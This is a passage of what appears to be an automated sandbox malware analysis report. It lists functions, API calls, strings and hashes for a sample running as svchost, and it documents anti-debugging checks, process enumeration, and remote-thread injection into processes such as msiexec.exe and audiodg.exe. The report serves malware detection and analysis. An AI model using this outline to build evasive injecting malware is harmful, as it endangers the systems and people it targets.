34 Function_00007FF7DF223184 89 Function_00007FF7DF223004 34->89 35 Function_00007FF7DF223384 35->51 36 Function_00007FF7DF222168 37 Function_00007FF7DF22E668 38 Function_00007FF7DF22EC71 39 Function_00007FF7DF22B772 40 Function_00007FF7DF22EA72 41 Function_00007FF7DF22B26F 42 Function_00007FF7DF223074 42->4 42->31 78 Function_00007FF7DF22440C 42->78 97 Function_00007FF7DF223BEC 42->97 98 Function_00007FF7DF223DEC 42->98 43 Function_00007FF7DF22B776 44 Function_00007FF7DF22B05A 45 Function_00007FF7DF22D65A 46 Function_00007FF7DF22FE5A 47 Function_00007FF7DF22B061 48 Function_00007FF7DF223364 48->51 50 Function_00007FF7DF22E6CD 51->10 51->27 81 Function_00007FF7DF222414 51->81 52 Function_00007FF7DF22EDB8 54 Function_00007FF7DF2235C1 55 Function_00007FF7DF22B2C0 56 Function_00007FF7DF2213C4 57 Function_00007FF7DF2236C4 58 Function_00007FF7DF22E6C5 59 Function_00007FF7DF22FEA9 60 Function_00007FF7DF2240AC 60->20 94 Function_00007FF7DF223AEC 60->94 61 Function_00007FF7DF223CAC 62 Function_00007FF7DF22E4AB 63 Function_00007FF7DF2300B0 64 Function_00007FF7DF2231B4 65 Function_00007FF7DF2236B4 66 Function_00007FF7DF22E6B4 68 Function_00007FF7DF22CE9D 69 Function_00007FF7DF22E0A1 70 Function_00007FF7DF2301A2 71 Function_00007FF7DF2232A4 71->17 71->18 71->24 71->25 71->101 72 Function_00007FF7DF2233A4 73 Function_00007FF7DF222EA4 74 Function_00007FF7DF22E0A5 75 Function_00007FF7DF22F6A3 76 Function_00007FF7DF22EC09 105 Function_00007FF7DF2236DC 77->105 78->26 79 Function_00007FF7DF22D70B 80 Function_00007FF7DF223414 80->13 80->14 80->60 80->61 80->64 80->71 80->72 82 Function_00007FF7DF223214 80->82 96 Function_00007FF7DF2241EC 80->96 104 Function_00007FF7DF223EDC 80->104 82->24 86 Function_00007FF7DF2242FC 82->86 83 Function_00007FF7DF22BBF9 84 Function_00007FF7DF22BBF7 85 Function_00007FF7DF22C4F8 86->3 87 Function_00007FF7DF22BBFB 88 Function_00007FF7DF221000 90 Function_00007FF7DF222E04 89->90 91 Function_00007FF7DF22EA05 92 Function_00007FF7DF22DE04 93 Function_00007FF7DF22D2E7 99 Function_00007FF7DF22BBF2 100 Function_00007FF7DF22E9F6 101->15 101->56 101->88 102 Function_00007FF7DF2301DA 103 Function_00007FF7DF22B0D8 106 Function_00007FF7DF22CCE1 107 Function_00007FF7DF22D2E5 108 Function_00007FF7DF22F7E6 109 Function_00007FF7DF22D2E3 110 Function_00007FF7DF22C2E4

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FF7DF223414 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 231 7ff7df223414-7ff7df22342a call 7ff7df22153c call 7ff7df2231b4 236 7ff7df22342c-7ff7df22342e ExitProcess 231->236 237 7ff7df223434-7ff7df223462 call 7ff7df2240ac call 7ff7df223cac call 7ff7df223edc 231->237 244 7ff7df223464-7ff7df223475 call 7ff7df2241ec 237->244 245 7ff7df2234b3-7ff7df2234c6 call 7ff7df223edc 237->245 252 7ff7df223477-7ff7df223488 call 7ff7df2241ec 244->252 253 7ff7df22348a-7ff7df22348c ExitProcess 244->253 250 7ff7df2234c8-7ff7df2234d9 call 7ff7df2241ec 245->250 251 7ff7df223504-7ff7df223517 call 7ff7df223edc 245->251 263 7ff7df2234db-7ff7df2234dd ExitProcess 250->263 264 7ff7df2234e3 call 7ff7df223214 250->264 261 7ff7df22355a-7ff7df223570 call 7ff7df223a3c call 7ff7df2233a4 251->261 262 7ff7df223519-7ff7df22352a call 7ff7df2241ec 251->262 252->253 260 7ff7df223492 call 7ff7df2232a4 252->260 271 7ff7df223497-7ff7df22349c 260->271 282 7ff7df223572-7ff7df223583 call 7ff7df2241ec 261->282 283 7ff7df2235c6-7ff7df22369e CreateThread * 3 WaitForMultipleObjects ExitProcess 261->283 278 7ff7df22352c-7ff7df22352e ExitProcess 262->278 279 7ff7df223534 call 7ff7df223214 262->279 269 7ff7df2234e8-7ff7df2234ed 264->269 273 7ff7df2234fc-7ff7df2234fe ExitProcess 269->273 274 7ff7df2234ef-7ff7df2234fa Sleep 269->274 276 7ff7df2234ab-7ff7df2234ad ExitProcess 271->276 277 7ff7df22349e-7ff7df2234a9 SleepEx 271->277 274->269 277->271 284 7ff7df223539-7ff7df22353e 279->284 289 7ff7df223598-7ff7df22359a ExitProcess 282->289 290 7ff7df223585-7ff7df223596 call 7ff7df2241ec 282->290 286 7ff7df22354d-7ff7df22354f ExitProcess 284->286 287 7ff7df223540-7ff7df22354b Sleep 284->287 287->284 290->289 293 7ff7df2235a0 call 7ff7df2232a4 290->293 295 7ff7df2235a5-7ff7df2235aa 293->295 296 7ff7df2235b9-7ff7df2235bb ExitProcess 295->296 297 7ff7df2235ac-7ff7df2235b7 Sleep 295->297 297->295
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                                                                                  • Opcode ID: 00f4f9e66aff6860661822dfc67d65ddf9a1eaf5e4239650d528e7efb97d6328
                                                                                                                                                                                                                                  • Instruction ID: 75c4a41c48c72e47a0b447952a9a02a7ce947c4dfa30a242269bb408b5b47464
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00f4f9e66aff6860661822dfc67d65ddf9a1eaf5e4239650d528e7efb97d6328
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E861E921A1CAC281FB65BB21AC553FEA2A0BF45340FC44137D54E8A5E6DF2DFA49C620
                                                                                                                                                                                                                                  Function 00007FF7DF2210D8 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OpenProcess
                                                                                                                                                                                                                                  • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                                  • API String ID: 3743895883-721857904
                                                                                                                                                                                                                                  • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                                  • Instruction ID: 755f9079b671faabce945b1daf0373b70241ddeaf05d0fec4662dbe8e1c32cc3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E711C3150CAC196E770AB15E8857AEF3A1FB84784FD08136D68D86BA8DF7CE584CB50
                                                                                                                                                                                                                                  Function 00007FF7DF2240AC Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                                                                                  • Opcode ID: 2dc5b7a4c2ac788fed40c1e4fd08826e44c1b763e7fe3fa29ec32dd5f663f271
                                                                                                                                                                                                                                  • Instruction ID: 89c62d4b1542cdb120486732e402dbbe4a6a8d2cb75d0341c36cfb2750c4d1e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dc5b7a4c2ac788fed40c1e4fd08826e44c1b763e7fe3fa29ec32dd5f663f271
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B311432A1CA8186E750EB15E8507AEF7A0FBD5780F904136FA8E47B68DF3DE5458B10
                                                                                                                                                                                                                                  Function 00007FF7DF22452C Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                                                                                  • Opcode ID: 482500e96dd0987bd15cea92275c1105989086282f4efcfdaf5ed813befa3f18
                                                                                                                                                                                                                                  • Instruction ID: 8b9f43798a6eb2391631efd75d8bfee0df26da7dc4dc1f47f59c0abd64698d3e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 482500e96dd0987bd15cea92275c1105989086282f4efcfdaf5ed813befa3f18
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B81CC36608B8186EA50DB55F8843AEF7A0FBD9B95F904136DA8D87768DF7CE044CB10
                                                                                                                                                                                                                                  Function 00007FF7DF22388C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22370C: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7DF22374C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22370C: GetVolumeInformationW.KERNELBASE ref: 00007FF7DF2237C9
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22370C: wsprintfW.USER32 ref: 00007FF7DF22386A
                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238D5
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238EA
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238FD
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF22390D
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223920
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223935
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223948
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF22395D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 4128e1d1825bb4aabfe353264e4b1b5eb3e5978e878722fa32083682d7f4baef
                                                                                                                                                                                                                                  • Instruction ID: becd5a3e4bf3469edee2677668bf56d0aee92092a8e70adafb34364446c1c044
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4128e1d1825bb4aabfe353264e4b1b5eb3e5978e878722fa32083682d7f4baef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4111F226289C685DB60AB25FCA47EEA361FBD4744FC09033DA4E43A69DF3CE508C754
                                                                                                                                                                                                                                  Function 00007FF7DF222E04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                                                                                  • Opcode ID: a105f404426a54bc7c8964e5747303432de1ce41a6b58a984192f11849bdca06
                                                                                                                                                                                                                                  • Instruction ID: 92af57d08aee534d56b0695b9bb94f1f754799100ab5f1e15b9aa4aaf911c04c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a105f404426a54bc7c8964e5747303432de1ce41a6b58a984192f11849bdca06
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8401792690CA8281E720AB11EC542FDA770FB98B95FC44537E98E426B4CE3DF585C611
                                                                                                                                                                                                                                  Function 00007FF7DF223FCC Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                                                                                  • Opcode ID: 31f5d79038dc9478e4afa5132ff2ec937677fbee5fe4a85a6cc82bd95e7a1872
                                                                                                                                                                                                                                  • Instruction ID: 376150ca4fc46e2007b595c82c6fccbf2812c5829640275ed3807197fd6c50d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f5d79038dc9478e4afa5132ff2ec937677fbee5fe4a85a6cc82bd95e7a1872
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E511F171A0C6C685E770AF11E8883EEA3A0FB84754FC08236D69D465D8DF3DE644DB10
                                                                                                                                                                                                                                  Function 00007FF7DF22370C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                                                                                  • Opcode ID: 2bf9011458a8b05a9254b4e26b90a8e12db43ff2ddd31f5c51e36a325afa16b9
                                                                                                                                                                                                                                  • Instruction ID: 1d07f73d847cfd2bea0bc0dc032b023976283355f39b5452cf3e561ba35692b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bf9011458a8b05a9254b4e26b90a8e12db43ff2ddd31f5c51e36a325afa16b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31310C2661C6C586E730DB64E8983EFB3A1FB94700F801136E68D87A58DB7DD549CF14
                                                                                                                                                                                                                                  Function 00007FF7DF223004 Relevance: 4.5, APIs: 3, Instructions: 24sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateMutex$CloseHandleObjectReleaseSingleSleepThreadWait
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2668954219-0
                                                                                                                                                                                                                                  • Opcode ID: f233bcf872192e729fbfbbcd8708d7c6c64be90af23155d05083dea7527ac4ad
                                                                                                                                                                                                                                  • Instruction ID: 9d4dcb24546694a6c2b71990fce66b14fba146b22da9d3d45892f2c88921c385
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f233bcf872192e729fbfbbcd8708d7c6c64be90af23155d05083dea7527ac4ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F0BE21A1C7C186F750AB25AD043EEB6A0BF88354FC04136E98A4A6E4CF3DE605CB20
                                                                                                                                                                                                                                  Function 00007FF7DF2231B4 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                                                                                  • Opcode ID: fb95f8ef0bc2ecc5dce42075ca2d6b9f5b34f365682c0d1478ff1e2aa5af605c
                                                                                                                                                                                                                                  • Instruction ID: bdc13e49617bb6b78b7b180891b99e33b38be6455495bf5235ad91208c0c8bdf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb95f8ef0bc2ecc5dce42075ca2d6b9f5b34f365682c0d1478ff1e2aa5af605c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DF0FE2590C2C285EB306B25AC053FDA7A0BB55708FC84277D58D4A594CF7CFA89DB35
                                                                                                                                                                                                                                  Function 00007FF7DF2241EC Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
